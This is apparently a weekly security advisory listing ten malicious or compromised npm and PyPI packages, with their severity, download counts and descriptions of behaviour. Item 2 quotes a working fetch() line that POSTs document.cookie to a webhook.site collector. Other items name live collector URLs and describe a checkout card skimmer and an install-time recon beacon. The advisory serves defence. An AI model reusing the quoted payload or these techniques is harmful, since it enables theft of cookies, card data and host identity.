This weekly list covers the ten most significant malicious or compromised packages recently observed in public registries.
1. rrs (pypi)
- Package: https://pypi.org/project/rrs/
- Severity: high
- Affected versions: all
- Downloads: 2282
- First seen: 21 September 2026 at 04:23 UTC
The rrs package advertises itself as a multi-monitor screen capture CLI but, on invocation, captures every attached monitor and POSTs the resulting PNG/JPEG images to a hardcoded Discord webhook controlled by the author. Alongside each upload, getsysteminfo() collects the machine's hostname (socket.gethostname()), OS login name (getpass.getuser()), OS name and release (platform.system()/release()), and the local IP address obtained via a UDP connect to 8.8.8.8, and embeds them in the webhook payload. The destination URL is not caller-configurable, there is no opt-out, and the exfiltration is not disclosed in the package metadata or description. This is an infostealer that turns every use of the tool into a silent upload of the installer's screen contents plus host/user fingerprint to attacker-controlled infrastructure.
2. npmscripttesstalertunpkg (npm)
- Package: https://www.npmjs.com/package/npmscripttesstalertunpkg
- Severity: medium
- Affected versions: all
- Downloads: 2030
- First seen: 21 September 2026 at 04:12 UTC
The package ships a single browser JavaScript file declared as both main and unpkg, so any page embedding the package via the unpkg CDN loads this script. The script calls alert(11) and then executes fetch('https://webhook.site/c226090c-12b0-462e-81d2-e632c7a58833/', { method: 'POST', mode: 'no-cors', body: document.cookie }), POSTing document.cookie to a hardcoded webhook.site collector. There is no other functionality in the package. Any site that includes this script exfiltrates its visitors' cookies to the attacker-controlled webhook.site endpoint, enabling session hijacking.
3. feed-widget-helper (npm)
- Package: https://www.npmjs.com/package/feed-widget-helper
- Severity: high
- Affected versions: all
- Downloads: 1473
- First seen: 21 September 2026 at 04:50 UTC
The package's main entry executes a top-level side effect that reads document.cookie and sends it via fetch to a hardcoded webhook.site collector URL (http://webhook.site/67dba5f1-70f5-413e-9299-2ad886bb77fa) over plain HTTP. Any environment that imports or requires this package leaks its browser cookies to an anonymous third-party listener controlled by the package author. The destination is a webhook.site inbox — an anonymous request-capture service unrelated to any legitimate feed-widget functionality — and the transmission fires unconditionally on load, with no caller opt-in or configuration.
4. @memtensor/memos-cloud-openclaw-plugin (npm)
- Package: https://www.npmjs.com/package/@memtensor/memos-cloud-openclaw-plugin
- Severity: critical
- Affected versions: 0.1.24
- Downloads: 1406
- First seen: 23 September 2026 at 12:53 UTC
This is a legitimate package that was compromised by a threat actor (potentially via a compromised credential).
Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.
5. luftmvfiwgxydes (npm)
- Package: https://www.npmjs.com/package/luftmvfiwgxydes
- Severity: high
- Affected versions: all
- Downloads: 1186
- First seen: 20 September 2026 at 10:30 UTC
Malicious package detected. Behaviors: obfuscated code.
6. homestack-cheer (npm)
- Package: https://www.npmjs.com/package/homestack-cheer
- Severity: critical
- Affected versions: all
- Downloads: 682
- First seen: 21 September 2026 at 05:27 UTC
This package is a sophisticated Magento/Stripe payment card skimmer using deliberate dual-entrypoint smuggling. The main UMD entry (dist/my-lib.umd.js) is a benign hello-world greet library, while the ESM module entrypoints (src/index.js, src/env_load.js) each execute new Function(atob('<~180KB base64>')), decoding multi-layer obfuscated payloads at runtime. The decoded qwdsc() function harvests card number, expiry, CVV, billing address, email, and useragent into a JSON object and exfiltrates it via an invisible iframe to an attacker controlled URL. The attack mechanism injects a look-alike Stripe iframe (__privateStripeFrame84331) into pages where window.location contains 'checkout', hides the real Stripe iframe, and intercepts card input through the fake form — a textbook web-skimmer targeting Magento storefronts. The publisher account 'cheerleads' was created less than a day before publication with only two packages, the deobfuscator recovered 116 IOCs including cdn.userationey.com and shipping.althemes.com as exfiltration endpoints, and OSV advisory MAL-2026-16333 independently corroborates this exact behavior.
7. @woodpecker-web-shared/components (npm)
- Package: https://www.npmjs.com/package/@woodpecker-web-shared/components
- Severity: critical
- Affected versions: all
- Downloads: 627
- First seen: 21 September 2026 at 17:54 UTC
On npm install, the package's postinstall hook runs node index.js, which collects installer host identifiers (os.hostname(), os.userInfo().username, os.platform(), architecture, cwd, node version, npmlifecycleevent) and POSTs them as JSON to a hardcoded third-party collector at https://webhook.site/d9bc4bcc-ce74-4193-ae4e-96d234bb2220. The payload includes a src: 'loMesb' tag consistent with a campaign identifier used to correlate exfiltrated data across victims. The @woodpecker-web-shared/components scope/name has no legitimate reason to transmit installer identity to an anonymous webhook collector at install time, and the behavior fires automatically without user interaction. This is a recon beacon consistent with a dependency-confusion or typosquat lure.
8. memoryos (pypi)
- Package: https://pypi.org/project/memoryos/
- Severity: critical
- Affected versions: 2.0.34
- Downloads: 604
- First seen: 23 September 2026 at 11:20 UTC
This is a legitimate package that was compromised with malware.
APT malware detected: PolinRider. Associated with threat actor(s): DPRK/Lazarus. Behaviors: data exfiltration, code execution, network activity, obfuscated code.
9. lufxchwmxwyps (npm)
- Package: https://www.npmjs.com/package/lufxchwmxwyps
- Severity: high
- Affected versions: all
- Downloads: 568
- First seen: 20 September 2026 at 10:29 UTC
Malicious package detected. Behaviors: obfuscated code.
10. @pwaplatform/module-sso-integration (npm)
- Package: https://www.npmjs.com/package/@pwaplatform/module-sso-integration
- Severity: critical
- Affected versions: all
- Downloads: 535
- First seen: 20 September 2026 at 11:50 UTC
The OpenSSF Package Analysis project identified '@pwaplatform/module-sso-integration' @ 99.0.0 (npm) as malicious.
It is considered malicious because:
- The package communicates with a domain associated with malicious activity.
- The package executes one or more commands associated with malicious behavior.
Want help mitigating malicious packages before they reach your network?
ShieldedStack acts as a security proxy in front of npm, PyPI, NuGet, and Maven, helping teams detect and block malicious or risky packages before they reach developer machines or CI pipelines.
Learn more: https://shieldedstack.com
Credits for the core data goes to https://opensourcemalware.com